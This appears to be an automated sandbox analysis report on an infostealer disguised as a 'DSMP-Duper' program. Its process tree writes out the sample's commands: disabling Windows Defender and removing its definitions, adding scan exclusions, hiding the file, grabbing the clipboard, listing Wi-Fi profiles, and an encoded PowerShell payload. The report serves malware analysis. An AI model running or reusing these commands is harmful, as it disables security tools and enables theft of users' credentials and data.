Analysis
-
max time kernel
149s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-en -
resource tags
arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system -
submitted
15/04/2025, 21:46
Behavioral task
behavioral1
Sample
DSMP-Duper.exe
Resource
win10v2004-20250410-en
Behavioral task
behavioral2
Sample
DSMP-Duper.exe
Resource
win11-20250410-en
Behavioral task
behavioral3
Sample
eqb��!�.pyc
Resource
win10v2004-20250314-en
Behavioral task
behavioral4
Sample
eqb��!�.pyc
Resource
win11-20250410-en
General
-
Target
DSMP-Duper.exe
-
Size
7.6MB
-
MD5
c83c2c53a06ae5c2afbf349d82a2b528
-
SHA1
46731510519aace4b0e618aabdb764a131d799ee
-
SHA256
9e34b9a14817f6285298052f8d29a454cd770c70f52b617f86196f90cdca436f
-
SHA512
d2f9b5053a5e9e8bf3c8acb5dd831239c59600d7b924cf85fc54516cede30191a4e04f2414645da943b3b532994f17b31cda90c2a818383b09f0fac938027446
-
SSDEEP
196608:0WhDbHnwfI9jUCBB7m+mKOY7rXrZusoWDmhfvsbnTNkY:z3MIHL7HmBYXrYWaUNl
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2284 powershell.exe 3584 powershell.exe 5852 powershell.exe 1120 powershell.exe 2728 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts DSMP-Duper.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3668 powershell.exe 5852 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 5480 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe 5116 DSMP-Duper.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 40 discord.com 41 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com 38 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 1208 tasklist.exe 1676 tasklist.exe 3352 tasklist.exe 3116 tasklist.exe 5600 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2640 cmd.exe -
resource yara_rule behavioral1/files/0x0008000000024156-21.dat upx behavioral1/memory/5116-25-0x00007FF9AF420000-0x00007FF9AFA85000-memory.dmp upx behavioral1/files/0x0008000000024101-27.dat upx behavioral1/files/0x0008000000024154-30.dat upx behavioral1/files/0x0008000000024100-39.dat upx behavioral1/files/0x0008000000024132-50.dat upx behavioral1/memory/5116-52-0x00007FF9C2740000-0x00007FF9C276B000-memory.dmp upx behavioral1/memory/5116-51-0x00007FF9C40B0000-0x00007FF9C40C9000-memory.dmp upx behavioral1/files/0x000b00000002416e-59.dat upx behavioral1/memory/5116-60-0x00007FF9BE850000-0x00007FF9BE9CF000-memory.dmp upx behavioral1/memory/5116-58-0x00007FF9C0340000-0x00007FF9C0365000-memory.dmp upx behavioral1/files/0x0008000000024135-57.dat upx behavioral1/files/0x000800000002413a-46.dat upx behavioral1/files/0x0008000000024134-44.dat upx behavioral1/files/0x0008000000024133-43.dat upx behavioral1/files/0x0008000000024131-41.dat upx behavioral1/files/0x0008000000024130-40.dat upx behavioral1/files/0x001600000002416f-38.dat upx behavioral1/files/0x0008000000024159-36.dat upx behavioral1/files/0x0008000000024155-33.dat upx behavioral1/files/0x000800000002414e-32.dat upx behavioral1/memory/5116-48-0x00007FF9C8250000-0x00007FF9C825F000-memory.dmp upx behavioral1/memory/5116-47-0x00007FF9C2A40000-0x00007FF9C2A67000-memory.dmp upx behavioral1/memory/5116-62-0x00007FF9C2790000-0x00007FF9C27A9000-memory.dmp upx behavioral1/memory/5116-70-0x00007FF9BF030000-0x00007FF9BF0FE000-memory.dmp upx behavioral1/memory/5116-72-0x00007FF9BF100000-0x00007FF9BF133000-memory.dmp upx behavioral1/memory/5116-73-0x00007FF9AEEE0000-0x00007FF9AF413000-memory.dmp upx behavioral1/memory/5116-67-0x00007FF9C63A0000-0x00007FF9C63AD000-memory.dmp upx behavioral1/memory/5116-66-0x00007FF9AF420000-0x00007FF9AFA85000-memory.dmp upx behavioral1/memory/5116-77-0x00007FF9C63C0000-0x00007FF9C63CD000-memory.dmp upx behavioral1/memory/5116-79-0x00007FF9BE6D0000-0x00007FF9BE783000-memory.dmp upx behavioral1/memory/5116-76-0x00007FF9C63D0000-0x00007FF9C63E4000-memory.dmp upx behavioral1/memory/5116-190-0x00007FF9C0340000-0x00007FF9C0365000-memory.dmp upx behavioral1/memory/5116-266-0x00007FF9BE850000-0x00007FF9BE9CF000-memory.dmp upx behavioral1/memory/5116-279-0x00007FF9C2790000-0x00007FF9C27A9000-memory.dmp upx behavioral1/memory/5116-280-0x00007FF9BF030000-0x00007FF9BF0FE000-memory.dmp upx behavioral1/memory/5116-281-0x00007FF9AEEE0000-0x00007FF9AF413000-memory.dmp upx behavioral1/memory/5116-309-0x00007FF9BF100000-0x00007FF9BF133000-memory.dmp upx behavioral1/memory/5116-334-0x00007FF9BE6D0000-0x00007FF9BE783000-memory.dmp upx behavioral1/memory/5116-326-0x00007FF9BE850000-0x00007FF9BE9CF000-memory.dmp upx behavioral1/memory/5116-320-0x00007FF9AF420000-0x00007FF9AFA85000-memory.dmp upx behavioral1/memory/5116-351-0x00007FF9C2A40000-0x00007FF9C2A67000-memory.dmp upx behavioral1/memory/5116-354-0x00007FF9BF100000-0x00007FF9BF133000-memory.dmp upx behavioral1/memory/5116-346-0x00007FF9AEEE0000-0x00007FF9AF413000-memory.dmp upx behavioral1/memory/5116-362-0x00007FF9BE6D0000-0x00007FF9BE783000-memory.dmp upx behavioral1/memory/5116-361-0x00007FF9C63D0000-0x00007FF9C63E4000-memory.dmp upx behavioral1/memory/5116-360-0x00007FF9BF030000-0x00007FF9BF0FE000-memory.dmp upx behavioral1/memory/5116-359-0x00007FF9C63C0000-0x00007FF9C63CD000-memory.dmp upx behavioral1/memory/5116-358-0x00007FF9C63A0000-0x00007FF9C63AD000-memory.dmp upx behavioral1/memory/5116-357-0x00007FF9C2790000-0x00007FF9C27A9000-memory.dmp upx behavioral1/memory/5116-356-0x00007FF9BE850000-0x00007FF9BE9CF000-memory.dmp upx behavioral1/memory/5116-355-0x00007FF9C0340000-0x00007FF9C0365000-memory.dmp upx behavioral1/memory/5116-353-0x00007FF9C40B0000-0x00007FF9C40C9000-memory.dmp upx behavioral1/memory/5116-352-0x00007FF9C2740000-0x00007FF9C276B000-memory.dmp upx behavioral1/memory/5116-350-0x00007FF9C8250000-0x00007FF9C825F000-memory.dmp upx behavioral1/memory/5116-335-0x00007FF9AF420000-0x00007FF9AFA85000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1840 cmd.exe 5744 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5708 netsh.exe 5100 cmd.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1576 WMIC.exe 5976 WMIC.exe 3544 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5336 systeminfo.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133892272276769498" chrome.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5744 PING.EXE -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 2284 powershell.exe 1120 powershell.exe 1120 powershell.exe 2284 powershell.exe 3584 powershell.exe 3584 powershell.exe 3668 powershell.exe 3668 powershell.exe 1372 powershell.exe 1372 powershell.exe 3668 powershell.exe 1372 powershell.exe 2728 powershell.exe 2728 powershell.exe 1756 powershell.exe 1756 powershell.exe 5852 powershell.exe 5852 powershell.exe 4844 powershell.exe 4844 powershell.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2284 powershell.exe Token: SeIncreaseQuotaPrivilege 4000 WMIC.exe Token: SeSecurityPrivilege 4000 WMIC.exe Token: SeTakeOwnershipPrivilege 4000 WMIC.exe Token: SeLoadDriverPrivilege 4000 WMIC.exe Token: SeSystemProfilePrivilege 4000 WMIC.exe Token: SeSystemtimePrivilege 4000 WMIC.exe Token: SeProfSingleProcessPrivilege 4000 WMIC.exe Token: SeIncBasePriorityPrivilege 4000 WMIC.exe Token: SeCreatePagefilePrivilege 4000 WMIC.exe Token: SeBackupPrivilege 4000 WMIC.exe Token: SeRestorePrivilege 4000 WMIC.exe Token: SeShutdownPrivilege 4000 WMIC.exe Token: SeDebugPrivilege 4000 WMIC.exe Token: SeSystemEnvironmentPrivilege 4000 WMIC.exe Token: SeRemoteShutdownPrivilege 4000 WMIC.exe Token: SeUndockPrivilege 4000 WMIC.exe Token: SeManageVolumePrivilege 4000 WMIC.exe Token: 33 4000 WMIC.exe Token: 34 4000 WMIC.exe Token: 35 4000 WMIC.exe Token: 36 4000 WMIC.exe Token: SeDebugPrivilege 1208 tasklist.exe Token: SeDebugPrivilege 1120 powershell.exe Token: SeIncreaseQuotaPrivilege 4000 WMIC.exe Token: SeSecurityPrivilege 4000 WMIC.exe Token: SeTakeOwnershipPrivilege 4000 WMIC.exe Token: SeLoadDriverPrivilege 4000 WMIC.exe Token: SeSystemProfilePrivilege 4000 WMIC.exe Token: SeSystemtimePrivilege 4000 WMIC.exe Token: SeProfSingleProcessPrivilege 4000 WMIC.exe Token: SeIncBasePriorityPrivilege 4000 WMIC.exe Token: SeCreatePagefilePrivilege 4000 WMIC.exe Token: SeBackupPrivilege 4000 WMIC.exe Token: SeRestorePrivilege 4000 WMIC.exe Token: SeShutdownPrivilege 4000 WMIC.exe Token: SeDebugPrivilege 4000 WMIC.exe Token: SeSystemEnvironmentPrivilege 4000 WMIC.exe Token: SeRemoteShutdownPrivilege 4000 WMIC.exe Token: SeUndockPrivilege 4000 WMIC.exe Token: SeManageVolumePrivilege 4000 WMIC.exe Token: 33 4000 WMIC.exe Token: 34 4000 WMIC.exe Token: 35 4000 WMIC.exe Token: 36 4000 WMIC.exe Token: SeIncreaseQuotaPrivilege 1576 WMIC.exe Token: SeSecurityPrivilege 1576 WMIC.exe Token: SeTakeOwnershipPrivilege 1576 WMIC.exe Token: SeLoadDriverPrivilege 1576 WMIC.exe Token: SeSystemProfilePrivilege 1576 WMIC.exe Token: SeSystemtimePrivilege 1576 WMIC.exe Token: SeProfSingleProcessPrivilege 1576 WMIC.exe Token: SeIncBasePriorityPrivilege 1576 WMIC.exe Token: SeCreatePagefilePrivilege 1576 WMIC.exe Token: SeBackupPrivilege 1576 WMIC.exe Token: SeRestorePrivilege 1576 WMIC.exe Token: SeShutdownPrivilege 1576 WMIC.exe Token: SeDebugPrivilege 1576 WMIC.exe Token: SeSystemEnvironmentPrivilege 1576 WMIC.exe Token: SeRemoteShutdownPrivilege 1576 WMIC.exe Token: SeUndockPrivilege 1576 WMIC.exe Token: SeManageVolumePrivilege 1576 WMIC.exe Token: 33 1576 WMIC.exe Token: 34 1576 WMIC.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1644 wrote to memory of 5116 1644 DSMP-Duper.exe 85 PID 1644 wrote to memory of 5116 1644 DSMP-Duper.exe 85 PID 5116 wrote to memory of 4800 5116 DSMP-Duper.exe 89 PID 5116 wrote to memory of 4800 5116 DSMP-Duper.exe 89 PID 5116 wrote to memory of 5040 5116 DSMP-Duper.exe 90 PID 5116 wrote to memory of 5040 5116 DSMP-Duper.exe 90 PID 5116 wrote to memory of 4816 5116 DSMP-Duper.exe 93 PID 5116 wrote to memory of 4816 5116 DSMP-Duper.exe 93 PID 5116 wrote to memory of 4020 5116 DSMP-Duper.exe 95 PID 5116 wrote to memory of 4020 5116 DSMP-Duper.exe 95 PID 4800 wrote to memory of 2284 4800 cmd.exe 97 PID 4800 wrote to memory of 2284 4800 cmd.exe 97 PID 4816 wrote to memory of 1208 4816 cmd.exe 98 PID 4816 wrote to memory of 1208 4816 cmd.exe 98 PID 4020 wrote to memory of 4000 4020 cmd.exe 99 PID 4020 wrote to memory of 4000 4020 cmd.exe 99 PID 5040 wrote to memory of 1120 5040 cmd.exe 100 PID 5040 wrote to memory of 1120 5040 cmd.exe 100 PID 5116 wrote to memory of 1688 5116 DSMP-Duper.exe 102 PID 5116 wrote to memory of 1688 5116 DSMP-Duper.exe 102 PID 1688 wrote to memory of 2660 1688 cmd.exe 104 PID 1688 wrote to memory of 2660 1688 cmd.exe 104 PID 5116 wrote to memory of 2524 5116 DSMP-Duper.exe 105 PID 5116 wrote to memory of 2524 5116 DSMP-Duper.exe 105 PID 2524 wrote to memory of 4092 2524 cmd.exe 107 PID 2524 wrote to memory of 4092 2524 cmd.exe 107 PID 5116 wrote to memory of 3168 5116 DSMP-Duper.exe 108 PID 5116 wrote to memory of 3168 5116 DSMP-Duper.exe 108 PID 3168 wrote to memory of 1576 3168 cmd.exe 110 PID 3168 wrote to memory of 1576 3168 cmd.exe 110 PID 5116 wrote to memory of 3968 5116 DSMP-Duper.exe 111 PID 5116 wrote to memory of 3968 5116 DSMP-Duper.exe 111 PID 3968 wrote to memory of 5976 3968 cmd.exe 113 PID 3968 wrote to memory of 5976 3968 cmd.exe 113 PID 5116 wrote to memory of 2640 5116 DSMP-Duper.exe 114 PID 5116 wrote to memory of 2640 5116 DSMP-Duper.exe 114 PID 5116 wrote to memory of 640 5116 DSMP-Duper.exe 116 PID 5116 wrote to memory of 640 5116 DSMP-Duper.exe 116 PID 2640 wrote to memory of 4372 2640 cmd.exe 118 PID 2640 wrote to memory of 4372 2640 cmd.exe 118 PID 640 wrote to memory of 3584 640 cmd.exe 119 PID 640 wrote to memory of 3584 640 cmd.exe 119 PID 5116 wrote to memory of 5840 5116 DSMP-Duper.exe 120 PID 5116 wrote to memory of 5840 5116 DSMP-Duper.exe 120 PID 5116 wrote to memory of 5768 5116 DSMP-Duper.exe 121 PID 5116 wrote to memory of 5768 5116 DSMP-Duper.exe 121 PID 5116 wrote to memory of 5028 5116 DSMP-Duper.exe 124 PID 5116 wrote to memory of 5028 5116 DSMP-Duper.exe 124 PID 5116 wrote to memory of 5852 5116 DSMP-Duper.exe 126 PID 5116 wrote to memory of 5852 5116 DSMP-Duper.exe 126 PID 5840 wrote to memory of 1676 5840 cmd.exe 128 PID 5840 wrote to memory of 1676 5840 cmd.exe 128 PID 5768 wrote to memory of 3352 5768 cmd.exe 129 PID 5768 wrote to memory of 3352 5768 cmd.exe 129 PID 5028 wrote to memory of 1792 5028 cmd.exe 130 PID 5028 wrote to memory of 1792 5028 cmd.exe 130 PID 5116 wrote to memory of 116 5116 DSMP-Duper.exe 131 PID 5116 wrote to memory of 116 5116 DSMP-Duper.exe 131 PID 5116 wrote to memory of 5172 5116 DSMP-Duper.exe 132 PID 5116 wrote to memory of 5172 5116 DSMP-Duper.exe 132 PID 5116 wrote to memory of 5100 5116 DSMP-Duper.exe 133 PID 5116 wrote to memory of 5100 5116 DSMP-Duper.exe 133 PID 5116 wrote to memory of 2684 5116 DSMP-Duper.exe 136 PID 5116 wrote to memory of 2684 5116 DSMP-Duper.exe 136 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4372 attrib.exe 5580 attrib.exe 5804 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe"C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe"C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:5976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe"4⤵
- Views/modifies file attributes
PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5840 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5768 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:1792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:116
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5172
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5100 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2684
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:2688
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:4444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAa